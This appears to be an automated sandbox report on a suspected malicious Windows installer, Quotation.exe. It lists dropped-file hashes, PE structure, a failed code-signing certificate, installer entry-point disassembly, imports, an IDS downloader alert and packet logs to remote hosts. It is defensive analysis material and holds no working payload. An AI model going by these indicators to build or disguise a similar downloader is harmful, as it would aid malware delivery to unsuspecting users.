                                                                                  Preview:.....................................n.........A...5............K.................C.........a............>....................................................................................p...................................................................................................................W.......................................m.........................................M..........................'......i.............................................................................................4....................................}....................................................................................................................................................x...........S..................'..y............................................../..........................................M..................Z.................................V.......................................=.....N...............................n..................................|. .....
                                                                                  Process:C:\Users\user\Desktop\Quotation.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):392462
                                                                                  Entropy (8bit):1.241128723454179
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:jby0EUrStmwpKcx/orVcYZ+M3ok1I7vZFCDrlv2UV5t3votN6cGia46OGj3OkYSk:FaZaukRTadSdbrJ5N275Ea3nRYS3r
                                                                                  MD5:F130EC3095DBECEDC791D8C58A59040C
                                                                                  SHA1:DAD2300B487F31F199520E1B41AB02B7D677B352
                                                                                  SHA-256:A56351ED69A301F5D9D89B6530280B7A85F998A806E1648911C37B6983BA9426
                                                                                  SHA-512:8599200F472F2D59390E8F2C497331640B12AB9FAF71817160C6D450EDF8A99F78CEF28CC3B57581D6AECFC1EC90A49947A6685C606321B6EE300D483C838360
                                                                                  Malicious:false
                                                                                  Preview:..................J......-..............K....e..........1......................D....................................?............K.V..............................................\....3.......................................L.................................A.........i........,...........................P.{............................................................r................................................V........................................e............&.................................................7...................k.........<...s................).................................................x...............................j................................`.................b.................G.......w..........................................{.........................................G..............................:.................#..............................................<..O......^..........O..............................7..\................................
                                                                                  Process:C:\Users\user\Desktop\Quotation.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):433786
                                                                                  Entropy (8bit):1.255949132332751
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:NFXORpsqJLOaVDzzoIgUPRGRoYNxHVxyczaUz4pP9Nom56I4tY6UBh1Yc88LaAQo:TUAoYxPzqoIzdwWR1+/24cwZXeCPiIBo
                                                                                  MD5:53FF1A157920AE92C9BF891D453D6B65
                                                                                  SHA1:B7BF3B7B16048F38132D8ACCA841130D73DB44C3
                                                                                  SHA-256:FAD1B5E641DC44B5A51048470D4E0FB47664CF2B994CEA24304495D99323B9DE
                                                                                  SHA-512:E739381C24627F89255DB55B2DA39A09F055A322C577C3604BA048FB2C817AE7F63B12131F8461491F6140953FB33DD94EB66D8CB3B13B36717143342CE270AF
                                                                                  Malicious:false
                                                                                  Preview:......................................j......................................."t......... .............Z..........................................+...o..G.......d......................................................................................X................5....................................F.........'.....................................................U...............................\............Y............)..............................d..D....................................................%.................................................Y..#.......................................................................................................................^.........................................j...........w...............................................n.....................................V..........i.............................................6...7..........*.........................................................................H.............................
                                                                                  Process:C:\Users\user\Desktop\Quotation.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):374902
                                                                                  Entropy (8bit):1.250991222921627
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:XkYzjcLYszRzU5n1C900tMkYQx+gnpovYHO:XkYz4DzQB5sYYH
                                                                                  MD5:169115C751DDA5E021E8C86E8454B26D
                                                                                  SHA1:5A8254634C0C726BB18E42E626EAEB581D532DCD
                                                                                  SHA-256:ACCD4911D88E808AED4A2AA27394628C62574810B0B47977B7103A246FDF2A10
                                                                                  SHA-512:2B643014E8623CADBA7CE78B91D3C751D60FCBF3FA69FA26F29A14E55679FC6A5C2074834B2496773A1756E3172EC7C898E2DF29CB4A0513DBF8BC0DCDDA7E04
                                                                                  Malicious:false
                                                                                  Preview:.......].....................................................S....................................^.4....................=.b.........................................................................o....O..................O........................t..............................I.................................................................;......................................m...................A.....................................i.........................................=...............................................................................................u..&...............................v............=................v...............p...............O.......'.............................K........................;............m......P................x.f....................K[.(..A..........#........................J..L........................i........................X................................................................................N..............f.........
                                                                                  Process:C:\Users\user\Desktop\Quotation.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):489048
                                                                                  Entropy (8bit):1.245615736901525
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:HMtjgMjMD1whyMu1IXCVAcFNpruXO+nBJH:stjgmYi03XDL+nBJ
                                                                                  MD5:B4FB425BAF217F31E91AAB39ABF66DCD
                                                                                  SHA1:03DE3BD0F923AB14213B6C4461C5CA73A0A6371C
                                                                                  SHA-256:4BC57A47B82B63EC20B393F65F3585EB81FE3F7748229CD19DEC8FE8A41D67C3
                                                                                  SHA-512:E72395FD6098130EFD543C5941781A1AA80FCE17C7701CB40FA8874271E0D43E0F7F082EBF5D458181287DE41CF4B34F88DCAABE84D8AD51003EF5DA1495D871
                                                                                  Malicious:false
                                                                                  Preview:.............9.....................A..............Z...........=.........................................................h...'.........................................................L..............................................p..C...........................,...................................p..........S............................................................................{............................................(.........C...^...........*............................U.........~................................................z.....................................A................................................]..........i.............,....................................g..............................3......K.....................u..............................................................H.t....................................................................................................................`....*.........................)1.............q..............4....
                                                                                  Process:C:\Users\user\Desktop\Quotation.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):371
                                                                                  Entropy (8bit):4.247837387326688
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:r8pLNAsEyv1WABlvMW9uu+IXvVJyQXPhXOQemtNxgFUvNwmA6AQOp2jMPA9cnb:ruJAOgABlQuTXbyKhXOLmtLgHmFOYjMV
                                                                                  MD5:46003C65AA12A0EBE55662F0141186DC
                                                                                  SHA1:739652C3375018DAFFB986302A7D3E8D32770B41
                                                                                  SHA-256:2EA079DEDE1B356842C5F5E0751B5E2B6565FDED65DAFB59A73D170C002ABB27
                                                                                  SHA-512:59D394789F9EECE97873D56AEA64F353D3E13E007E4ACBD396AC76CB68E91494EB65888049EF05CBE9B20597ADADCC960D067F90AAD3EA5AA46AC3A82F5B82FD
                                                                                  Malicious:false
                                                                                  Preview:degageredes indtgters commencing subfunctional rubiator startkatalogernes dismasted outsport..surkaalen syndedes turtledoving,leddelsestes obs jernholdigt normsammenbruds.azotite hestesko hvilkes snrkels enstatitite nappes,slangudtrykkets squills consonantising windchest interpretableness lynkrigen..vinders drikkegildet orgal snakkehjrnets responders etageejendommens..
                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                  Entropy (8bit):7.811676042471184
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:Quotation.exe
                                                                                  File size:1'197'176 bytes
                                                                                  MD5:5607e8b6d0197e51ec19233e72bc2036
                                                                                  SHA1:91cf6d8f6eeb59e44741d16c4a1ba38cffe59435
                                                                                  SHA256:2013e4b243a72b09add6488f84ad97b47ce0587cdecc1114f4380c82650e069c
                                                                                  SHA512:bd1334cf2a73bfaf4b4235baaa0b4f0ef86e352e90323f60912a1e749f31e2ce82cb29acd45e8b3df74bd0f172239f7cf31fd3f7303eb299d9d7e21ea4e4dd92
                                                                                  SSDEEP:24576:64nhDoAFKQnWqZRi73deBNF12ZNXLGQ7WczkxFnfbP98:6+hkhQnxZRiBe5iNXKQKczga
                                                                                  TLSH:B445232636E2C04BD9830A794BF7F33A897EDD153C16982677702B4EDD7128CDD8A660
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............o...o...o...k...o...i...o...n...o...n...o.I.k...o.I.....o.I.m...o.Rich..o.................PE..L...!.*c.................n.
                                                                                  Icon Hash:873335651170390f
                                                                                  Entrypoint:0x4036da
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:true
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x632AE721 [Wed Sep 21 10:27:45 2022 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:5
                                                                                  OS Version Minor:1
                                                                                  File Version Major:5
                                                                                  File Version Minor:1
                                                                                  Subsystem Version Major:5
                                                                                  Subsystem Version Minor:1
                                                                                  Import Hash:3f91aceea750f765ef2ba5d9988e6a00
                                                                                  Signature Valid:false
                                                                                  Signature Issuer:CN=Frostklart, O=Frostklart, L=Ancey, C=FR
                                                                                  Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                  Error Number:-2146762487
                                                                                  Not Before, Not After
                                                                                  • 29/11/2023 00:14:30 28/11/2026 00:14:30
                                                                                  Subject Chain
                                                                                  • CN=Frostklart, O=Frostklart, L=Ancey, C=FR
                                                                                  Version:3
                                                                                  Thumbprint MD5:D5180E15196D1898A3B907839CE72F94
                                                                                  Thumbprint SHA-1:A93ACCEF1A204E7A231C86AEFAD621EF80205976
                                                                                  Thumbprint SHA-256:FF48C37C9BCF76FF4194B83CBD8074DDC3CDFB204216E18F8FDAF4E7382836BA
                                                                                  Serial:531598CA6A96AABCE1A02FB8223F6BA8E6DA2A2E
                                                                                  Instruction
                                                                                  sub esp, 000003ECh
                                                                                  push ebx
                                                                                  push ebp
                                                                                  push esi
                                                                                  push edi
                                                                                  xor ebx, ebx
                                                                                  mov edi, 00408528h
                                                                                  push 00008001h
                                                                                  mov dword ptr [esp+14h], ebx
                                                                                  mov ebp, ebx
                                                                                  call dword ptr [00408170h]
                                                                                  mov esi, dword ptr [004080ACh]
                                                                                  lea eax, dword ptr [esp+2Ch]
                                                                                  xorps xmm0, xmm0
                                                                                  mov dword ptr [esp+40h], ebx
                                                                                  push eax
                                                                                  movlpd qword ptr [esp+00000144h], xmm0
                                                                                  mov dword ptr [esp+30h], 0000011Ch
                                                                                  call esi
                                                                                  test eax, eax
                                                                                  jne 00007FAAD884FB59h
                                                                                  lea eax, dword ptr [esp+2Ch]
                                                                                  mov dword ptr [esp+2Ch], 00000114h
                                                                                  push eax
                                                                                  call esi
                                                                                  push 00000053h
                                                                                  pop eax
                                                                                  mov dl, 04h
                                                                                  mov byte ptr [esp+00000146h], dl
                                                                                  cmp word ptr [esp+40h], ax
                                                                                  jne 00007FAAD884FB33h
                                                                                  mov eax, dword ptr [esp+5Ah]
                                                                                  add eax, FFFFFFD0h
                                                                                  mov word ptr [esp+00000140h], ax
                                                                                  jmp 00007FAAD884FB2Dh
                                                                                  xor eax, eax
                                                                                  jmp 00007FAAD884FB14h
                                                                                  mov dl, byte ptr [esp+00000146h]
                                                                                  cmp dword ptr [esp+30h], 0Ah
                                                                                  jnc 00007FAAD884FB2Dh
                                                                                  movzx eax, word ptr [esp+38h]
                                                                                  mov dword ptr [esp+38h], eax
                                                                                  jmp 00007FAAD884FB26h
                                                                                  mov eax, dword ptr [esp+38h]
                                                                                  mov dword ptr [007A8638h], eax
                                                                                  movzx eax, byte ptr [esp+30h]
                                                                                  shl ax, 0008h
                                                                                  movzx ecx, ax
                                                                                  movzx eax, byte ptr [esp+34h]
                                                                                  or ecx, eax
                                                                                  movzx eax, byte ptr [esp+00000140h]
                                                                                  shl ax, 0008h
                                                                                  shl ecx, 10h
                                                                                  movzx eax, word ptr [eax]
                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x8a000xa0.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x3db0000x3e910.rsrc
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x1232880x11f0.data
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                  .text0x10000x6c0b0x6e009178309eee1a86dc5ef945d6826a6897False0.6605823863636363data6.398414552532143IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                  .rdata0x80000x18960x1a000885e83a553c38819d1fab2908ca0cf5False0.4307391826923077data4.86610208699674IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .data0xa0000x39e6400x2005c0f03a1a77f205400c2cbabec9976c4unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .ndata0x3a90000x320000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .rsrc0x3db0000x3e9100x3ea002690c3c0c1de505f961321c7e2d6da34False0.6915076097804391data6.574790239627466IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                  RT_ICON0x3db3880x16482PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States1.000394451383867
                                                                                  RT_ICON0x3f18100x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.486498876138649
                                                                                  RT_ICON0x4020380x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.5308492747529956
                                                                                  RT_ICON0x40b4e00x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.5497227356746766
                                                                                  RT_ICON0x4109680x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.5415682569674067
                                                                                  RT_ICON0x414b900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5884854771784233
                                                                                  RT_ICON0x4171380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.6179643527204502
                                                                                  RT_ICON0x4181e00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.6668032786885246
                                                                                  RT_ICON0x418b680x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.7287234042553191
                                                                                  RT_DIALOG0x418fd00x100dataEnglishUnited States0.5234375
                                                                                  RT_DIALOG0x4190d00x11cdataEnglishUnited States0.6056338028169014
                                                                                  RT_DIALOG0x4191f00xc4dataEnglishUnited States0.5918367346938775
                                                                                  RT_DIALOG0x4192b80x60dataEnglishUnited States0.7291666666666666
                                                                                  RT_GROUP_ICON0x4193180x84Targa image data - Map 32 x 25730 x 1 +1EnglishUnited States0.7348484848484849
                                                                                  RT_VERSION0x4193a00x220dataEnglishUnited States0.5110294117647058
                                                                                  RT_MANIFEST0x4195c00x349XML 1.0 document, ASCII text, with very long lines (841), with no line terminatorsEnglishUnited States0.5529131985731273
                                                                                  DLLImport
                                                                                  ADVAPI32.dllRegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegEnumKeyW, RegEnumValueW, RegQueryValueExW, RegSetValueExW, OpenProcessToken, AdjustTokenPrivileges, LookupPrivilegeValueW, SetFileSecurityW, RegCreateKeyExW, RegOpenKeyExW
                                                                                  SHELL32.dllShellExecuteExW, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, SHGetSpecialFolderLocation
                                                                                  ole32.dllOleInitialize, OleUninitialize, CoTaskMemFree, IIDFromString, CoCreateInstance
                                                                                  COMCTL32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
                                                                                  USER32.dllDispatchMessageW, wsprintfA, SystemParametersInfoW, SetClassLongW, GetWindowLongW, GetSysColor, ScreenToClient, SetCursor, GetWindowRect, TrackPopupMenu, AppendMenuW, EnableMenuItem, CreatePopupMenu, GetSystemMenu, GetSystemMetrics, IsWindowEnabled, EmptyClipboard, SetClipboardData, CloseClipboard, OpenClipboard, CheckDlgButton, EndDialog, DialogBoxParamW, IsWindowVisible, SetWindowPos, CreateWindowExW, GetClassInfoW, PeekMessageW, CallWindowProcW, GetMessagePos, CharNextW, ExitWindowsEx, SetWindowTextW, SetTimer, CreateDialogParamW, DestroyWindow, LoadImageW, FindWindowExW, SetWindowLongW, InvalidateRect, ReleaseDC, GetDC, SetForegroundWindow, EnableWindow, GetDlgItem, ShowWindow, IsWindow, PostQuitMessage, SendMessageTimeoutW, SendMessageW, wsprintfW, FillRect, GetClientRect, EndPaint, BeginPaint, DrawTextW, DefWindowProcW, SetDlgItemTextW, GetDlgItemTextW, CharNextA, MessageBoxIndirectW, RegisterClassW, CharPrevW, LoadCursorW
                                                                                  GDI32.dllSetBkMode, CreateBrushIndirect, GetDeviceCaps, SelectObject, DeleteObject, SetBkColor, SetTextColor, CreateFontIndirectW
                                                                                  KERNEL32.dllWriteFile, GetLastError, WaitForSingleObject, GetExitCodeProcess, GetTempFileNameW, CreateFileW, CreateDirectoryW, WideCharToMultiByte, lstrlenW, lstrcpynW, GlobalLock, GlobalUnlock, CreateThread, GetDiskFreeSpaceW, CopyFileW, GetVersionExW, GetWindowsDirectoryW, ExitProcess, GetCurrentProcess, CreateProcessW, GetTempPathW, SetEnvironmentVariableW, GetCommandLineW, GetModuleFileNameW, GetTickCount, GetFileSize, MultiByteToWideChar, MoveFileW, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, lstrcmpiW, lstrcmpW, MulDiv, GlobalFree, GlobalAlloc, LoadLibraryExW, GetModuleHandleW, FreeLibrary, Sleep, CloseHandle, SetFileTime, SetFilePointer, SetFileAttributesW, ReadFile, GetShortPathNameW, GetFullPathNameW, GetFileAttributesW, FindNextFileW, FindFirstFileW, FindClose, DeleteFileW, CompareFileTime, SearchPathW, SetCurrentDirectoryW, ExpandEnvironmentStringsW, RemoveDirectoryW, GetSystemDirectoryW, MoveFileExW, GetModuleHandleA, GetProcAddress, lstrcmpiA, lstrcpyA, lstrcatW, SetErrorMode
                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                  EnglishUnited States
                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                  2024-10-31T10:45:20.670689+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949973142.250.185.238443TCP
                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Oct 31, 2024 10:45:19.181154013 CET49973443192.168.2.9142.250.185.238
                                                                                  Oct 31, 2024 10:45:19.181193113 CET44349973142.250.185.238192.168.2.9
                                                                                  Oct 31, 2024 10:45:19.181277037 CET49973443192.168.2.9142.250.185.238
                                                                                  Oct 31, 2024 10:45:19.349750996 CET49973443192.168.2.9142.250.185.238
                                                                                  Oct 31, 2024 10:45:19.349776983 CET44349973142.250.185.238192.168.2.9
                                                                                  Oct 31, 2024 10:45:20.247996092 CET44349973142.250.185.238192.168.2.9
                                                                                  Oct 31, 2024 10:45:20.248171091 CET49973443192.168.2.9142.250.185.238
                                                                                  Oct 31, 2024 10:45:20.248953104 CET44349973142.250.185.238192.168.2.9
                                                                                  Oct 31, 2024 10:45:20.249039888 CET49973443192.168.2.9142.250.185.238
                                                                                  Oct 31, 2024 10:45:20.306324959 CET49973443192.168.2.9142.250.185.238
                                                                                  Oct 31, 2024 10:45:20.306365013 CET44349973142.250.185.238192.168.2.9
                                                                                  Oct 31, 2024 10:45:20.306744099 CET44349973142.250.185.238192.168.2.9
                                                                                  Oct 31, 2024 10:45:20.306802988 CET49973443192.168.2.9142.250.185.238
                                                                                  Oct 31, 2024 10:45:20.311475039 CET49973443192.168.2.9142.250.185.238
                                                                                  Oct 31, 2024 10:45:20.355344057 CET44349973142.250.185.238192.168.2.9
                                                                                  Oct 31, 2024 10:45:20.670675993 CET44349973142.250.185.238192.168.2.9
                                                                                  Oct 31, 2024 10:45:20.670939922 CET49973443192.168.2.9142.250.185.238
                                                                                  Oct 31, 2024 10:45:20.670950890 CET44349973142.250.185.238192.168.2.9
                                                                                  Oct 31, 2024 10:45:20.671006918 CET49973443192.168.2.9142.250.185.238
                                                                                  Oct 31, 2024 10:45:20.671072960 CET49973443192.168.2.9142.250.185.238
                                                                                  Oct 31, 2024 10:45:20.671097040 CET44349973142.250.185.238192.168.2.9
                                                                                  Oct 31, 2024 10:45:20.671152115 CET49973443192.168.2.9142.250.185.238
                                                                                  Oct 31, 2024 10:45:20.695652008 CET49974443192.168.2.9172.217.16.129
                                                                                  Oct 31, 2024 10:45:20.695707083 CET44349974172.217.16.129192.168.2.9
                                                                                  Oct 31, 2024 10:45:20.695849895 CET49974443192.168.2.9172.217.16.129
                                                                                  Oct 31, 2024 10:45:20.696203947 CET49974443192.168.2.9172.217.16.129
                                                                                  Oct 31, 2024 10:45:20.696217060 CET44349974172.217.16.129192.168.2.9
                                                                                  Oct 31, 2024 10:45:21.566843987 CET44349974172.217.16.129192.168.2.9
                                                                                  Oct 31, 2024 10:45:21.566973925 CET49974443192.168.2.9172.217.16.129
                                                                                  Oct 31, 2024 10:45:21.571389914 CET49974443192.168.2.9172.217.16.129
                                                                                  Oct 31, 2024 10:45:21.571403027 CET44349974172.217.16.129192.168.2.9
                                                                                  Oct 31, 2024 10:45:21.571743965 CET44349974172.217.16.129192.168.2.9
                                                                                  Oct 31, 2024 10:45:21.571821928 CET49974443192.168.2.9172.217.16.129
                                                                                  Oct 31, 2024 10:45:21.572227955 CET49974443192.168.2.9172.217.16.129
                                                                                  Oct 31, 2024 10:45:21.619334936 CET44349974172.217.16.129192.168.2.9
                                                                                  Oct 31, 2024 10:45:24.065629959 CET44349974172.217.16.129192.168.2.9
                                                                                  Oct 31, 2024 10:45:24.065767050 CET49974443192.168.2.9172.217.16.129
                                                                                  Oct 31, 2024 10:45:24.073929071 CET44349974172.217.16.129192.168.2.9
                                                                                  Oct 31, 2024 10:45:24.074086905 CET49974443192.168.2.9172.217.16.129
                                                                                  Oct 31, 2024 10:45:24.184010983 CET44349974172.217.16.129192.168.2.9
                                                                                  Oct 31, 2024 10:45:24.184097052 CET44349974172.217.16.129192.168.2.9
                                                                                  Oct 31, 2024 10:45:24.184149027 CET49974443192.168.2.9172.217.16.129
                                                                                  Oct 31, 2024 10:45:24.184166908 CET44349974172.217.16.129192.168.2.9
                                                                                  Oct 31, 2024 10:45:24.184340000 CET49974443192.168.2.9172.217.16.129
                                                                                  Oct 31, 2024 10:45:24.184340000 CET49974443192.168.2.9172.217.16.129
                                                                                  Oct 31, 2024 10:45:24.185854912 CET44349974172.217.16.129192.168.2.9
                                                                                  Oct 31, 2024 10:45:24.185905933 CET49974443192.168.2.9172.217.16.129
                                                                                  Oct 31, 2024 10:45:24.185918093 CET44349974172.217.16.129192.168.2.9
                                                                                  Oct 31, 2024 10:45:24.185967922 CET49974443192.168.2.9172.217.16.129
                                                                                  Oct 31, 2024 10:45:24.190237999 CET44349974172.217.16.129192.168.2.9
                                                                                  Oct 31, 2024 10:45:24.190359116 CET49974443192.168.2.9172.217.16.129
                                                                                  Oct 31, 2024 10:45:24.190371037 CET44349974172.217.16.129192.168.2.9
                                                                                  Oct 31, 2024 10:45:24.190418005 CET49974443192.168.2.9172.217.16.129
                                                                                  Oct 31, 2024 10:45:24.198879004 CET44349974172.217.16.129192.168.2.9
                                                                                  Oct 31, 2024 10:45:24.199125051 CET49974443192.168.2.9172.217.16.129
                                                                                  Oct 31, 2024 10:45:24.199140072 CET44349974172.217.16.129192.168.2.9
                                                                                  Oct 31, 2024 10:45:24.199193954 CET49974443192.168.2.9172.217.16.129
                                                                                  Oct 31, 2024 10:45:24.207681894 CET44349974172.217.16.129192.168.2.9
                                                                                  Oct 31, 2024 10:45:24.207787991 CET49974443192.168.2.9172.217.16.129
                                                                                  Oct 31, 2024 10:45:24.207796097 CET44349974172.217.16.129192.168.2.9
                                                                                  Oct 31, 2024 10:45:24.207850933 CET49974443192.168.2.9172.217.16.129
                                                                                  Oct 31, 2024 10:45:24.216207027 CET44349974172.217.16.129192.168.2.9
                                                                                  Oct 31, 2024 10:45:24.216291904 CET49974443192.168.2.9172.217.16.129
                                                                                  Oct 31, 2024 10:45:24.216299057 CET44349974172.217.16.129192.168.2.9
                                                                                  Oct 31, 2024 10:45:24.216372013 CET49974443192.168.2.9172.217.16.129
                                                                                  Oct 31, 2024 10:45:24.216377020 CET44349974172.217.16.129192.168.2.9
                                                                                  Oct 31, 2024 10:45:24.216420889 CET49974443192.168.2.9172.217.16.129
                                                                                  Oct 31, 2024 10:45:24.225123882 CET44349974172.217.16.129192.168.2.9
                                                                                  Oct 31, 2024 10:45:24.225219011 CET49974443192.168.2.9172.217.16.129
                                                                                  Oct 31, 2024 10:45:24.225248098 CET44349974172.217.16.129192.168.2.9
                                                                                  Oct 31, 2024 10:45:24.225330114 CET49974443192.168.2.9172.217.16.129
                                                                                  Oct 31, 2024 10:45:24.233961105 CET44349974172.217.16.129192.168.2.9
                                                                                  Oct 31, 2024 10:45:24.234061956 CET49974443192.168.2.9172.217.16.129
                                                                                  Oct 31, 2024 10:45:24.234071970 CET44349974172.217.16.129192.168.2.9
                                                                                  Oct 31, 2024 10:45:24.234154940 CET49974443192.168.2.9172.217.16.129
                                                                                  Oct 31, 2024 10:45:24.242750883 CET44349974172.217.16.129192.168.2.9
                                                                                  Oct 31, 2024 10:45:24.242896080 CET49974443192.168.2.9172.217.16.129
                                                                                  Oct 31, 2024 10:45:24.242904902 CET44349974172.217.16.129192.168.2.9
                                                                                  Oct 31, 2024 10:45:24.242955923 CET49974443192.168.2.9172.217.16.129
                                                                                  Oct 31, 2024 10:45:24.302465916 CET44349974172.217.16.129192.168.2.9
                                                                                  Oct 31, 2024 10:45:24.302535057 CET44349974172.217.16.129192.168.2.9
                                                                                  Oct 31, 2024 10:45:24.302587986 CET49974443192.168.2.9172.217.16.129
                                                                                  Oct 31, 2024 10:45:24.302598000 CET44349974172.217.16.129192.168.2.9
                                                                                  Oct 31, 2024 10:45:24.302644968 CET49974443192.168.2.9172.217.16.129
                                                                                  Oct 31, 2024 10:45:24.302691936 CET49974443192.168.2.9172.217.16.129
                                                                                  Oct 31, 2024 10:45:24.302795887 CET44349974172.217.16.129192.168.2.9
                                                                                  Oct 31, 2024 10:45:24.302855968 CET49974443192.168.2.9172.217.16.129
                                                                                  Oct 31, 2024 10:45:24.302903891 CET44349974172.217.16.129192.168.2.9
                                                                                  Oct 31, 2024 10:45:24.302959919 CET44349974172.217.16.129192.168.2.9
                                                                                  Oct 31, 2024 10:45:24.302967072 CET49974443192.168.2.9172.217.16.129
                                                                                  Oct 31, 2024 10:45:24.302972078 CET44349974172.217.16.129192.168.2.9
                                                                                  Oct 31, 2024 10:45:24.303028107 CET49974443192.168.2.9172.217.16.129
                                                                                  Oct 31, 2024 10:45:24.303056002 CET49974443192.168.2.9172.217.16.129
                                                                                  Oct 31, 2024 10:45:24.303761959 CET44349974172.217.16.129192.168.2.9
                                                                                  Oct 31, 2024 10:45:24.303822994 CET49974443192.168.2.9172.217.16.129
                                                                                  Oct 31, 2024 10:45:24.304207087 CET44349974172.217.16.129192.168.2.9
                                                                                  Oct 31, 2024 10:45:24.304251909 CET44349974172.217.16.129192.168.2.9
                                                                                  Oct 31, 2024 10:45:24.304285049 CET49974443192.168.2.9172.217.16.129
                                                                                  Oct 31, 2024 10:45:24.304291010 CET44349974172.217.16.129192.168.2.9
                                                                                  Oct 31, 2024 10:45:24.304317951 CET49974443192.168.2.9172.217.16.129
                                                                                  Oct 31, 2024 10:45:24.304362059 CET49974443192.168.2.9172.217.16.129
                                                                                  Oct 31, 2024 10:45:24.304903984 CET44349974172.217.16.129192.168.2.9
                                                                                  Oct 31, 2024 10:45:24.304969072 CET49974443192.168.2.9172.217.16.129
                                                                                  Oct 31, 2024 10:45:24.308551073 CET44349974172.217.16.129192.168.2.9
                                                                                  Oct 31, 2024 10:45:24.308629990 CET49974443192.168.2.9172.217.16.129
                                                                                  Oct 31, 2024 10:45:24.308635950 CET44349974172.217.16.129192.168.2.9
                                                                                  Oct 31, 2024 10:45:24.308689117 CET49974443192.168.2.9172.217.16.129
                                                                                  Oct 31, 2024 10:45:24.309036970 CET44349974172.217.16.129192.168.2.9
                                                                                  Oct 31, 2024 10:45:24.309099913 CET49974443192.168.2.9172.217.16.129
                                                                                  Oct 31, 2024 10:45:24.309106112 CET44349974172.217.16.129192.168.2.9
                                                                                  Oct 31, 2024 10:45:24.309178114 CET49974443192.168.2.9172.217.16.129
                                                                                  Oct 31, 2024 10:45:24.317266941 CET44349974172.217.16.129192.168.2.9
                                                                                  Oct 31, 2024 10:45:24.317311049 CET44349974172.217.16.129192.168.2.9
                                                                                  Oct 31, 2024 10:45:24.317341089 CET49974443192.168.2.9172.217.16.129
                                                                                  Oct 31, 2024 10:45:24.317347050 CET44349974172.217.16.129192.168.2.9
